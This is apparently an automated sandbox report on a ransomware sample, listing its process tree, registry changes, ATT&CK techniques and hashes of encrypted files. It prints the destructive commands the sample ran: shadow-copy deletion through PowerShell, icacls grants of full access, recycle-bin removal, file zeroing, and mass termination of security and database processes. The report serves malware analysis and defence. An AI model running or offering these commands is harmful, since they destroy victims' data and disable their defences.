46 PID 2060 wrote to memory of 356 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 46 PID 2060 wrote to memory of 356 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 46 PID 2060 wrote to memory of 3024 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 48 PID 2060 wrote to memory of 3024 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 48 PID 2060 wrote to memory of 3024 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 48 PID 2060 wrote to memory of 2796 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 51 PID 2060 wrote to memory of 2796 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 51 PID 2060 wrote to memory of 2796 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 51 PID 2060 wrote to memory of 1448 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 53 PID 2060 wrote to memory of 1448 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 53 PID 2060 wrote to memory of 1448 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 53 PID 2060 wrote to memory of 2884 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 55 PID 2060 wrote to memory of 2884 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 55 PID 2060 wrote to memory of 2884 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 55 PID 2060 wrote to memory of 1496 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 57 PID 2060 wrote to memory of 1496 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 57 PID 2060 wrote to memory of 1496 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 57 PID 2060 wrote to memory of 1556 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 59 PID 2060 wrote to memory of 1556 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 59 PID 2060 wrote to memory of 1556 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 59 PID 2060 wrote to memory of 1384 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 61 PID 2060 wrote to memory of 1384 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 61 PID 2060 wrote to memory of 1384 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 61 PID 2060 wrote to memory of 2344 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 63 PID 2060 wrote to memory of 2344 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 63 PID 2060 wrote to memory of 2344 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 63 PID 2060 wrote to memory of 396 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 65 PID 2060 wrote to memory of 396 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 65 PID 2060 wrote to memory of 396 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 65 PID 2060 wrote to memory of 580 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 67 PID 2060 wrote to memory of 580 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 67 PID 2060 wrote to memory of 580 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 67 PID 2060 wrote to memory of 1224 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 68 PID 2060 wrote to memory of 1224 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 68 PID 2060 wrote to memory of 1224 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 68 PID 2060 wrote to memory of 2144 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 71 PID 2060 wrote to memory of 2144 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 71 PID 2060 wrote to memory of 2144 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 71 PID 2060 wrote to memory of 2964 2060 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe 73 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "All your files have been encrypted" 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = " If you want to restore them, write us to the e-mail [email protected]\r\nor\r\[email protected]" 5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe"C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2060 -
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:2368
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:2760
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:2668
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2536
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
- Launches sc.exe
PID:2544
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
- Launches sc.exe
PID:2552
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
- Launches sc.exe
PID:2584
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
- Launches sc.exe
PID:356
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:3024
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:1448
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:2884
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2344
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
- Network Service Discovery
PID:2144
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:2412
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2484
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2912
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:972
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:2560
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:2820
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2652
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2152
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
PID:604
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3060 -
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1240
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe2⤵
- Deletes itself
PID:1580 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1576
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.[ID-80F7800A].[[email protected]].CRYSTAL
Filesize180KB
MD5d130ee61209ebb1a16ffa6c9fc41b728
SHA1d0927a6f9a57d799b09f6a8b262b2a3d641e9de7
SHA2569f8481bee0c4164e292cab9a7516bfea01e56557317cfaa9ebfe932d90317e8d
SHA5126a9157e331e10123d25a8ae7cde5da9ac394343f53ecdaa0c71864441cf7202583d9cf6dcd8cf48deabc4a91b5f0c79c89af8e2c08d8a94cd5c6d9161ecbea17
-
Filesize
1KB
MD5a2b2d90a01e470538147fa1756f8929b
SHA1b8ab4ca1e3ab372b8ee3853e801302c03d093ac0
SHA256c4fd083a080b6459af643b7beb88c1ef4aa413ede25d738b693bb6f3cfd63eb8
SHA512c4b5865e7ffa07974241b94decf8ddb106b203a60060e312458efbafde90f7e90ea5fb49a782f6a174af83a9647d16e0a214fdd431151186ece9da0d1d1441a2
-
C:\Users\Admin\Desktop\RepairApprove.xlsx.[ID-80F7800A].[[email protected]].CRYSTAL
Filesize9KB
MD5d505ede07940cdd4bbb8dd16169246f4
SHA17569b88c64baa33d5748d095f77d7df291361f8a
SHA256f1dc60e09322bdb9f139cbc6915d4a2253d33ccccac0bf6d10452b0cd5195500
SHA512314517eae6d61daca6d1bddfbf12876d8736a9e6f380df6390dee595c95ffcd68e983ae5a56d4dc1598c79773c020b69acbb47969e5d718586939393877999c7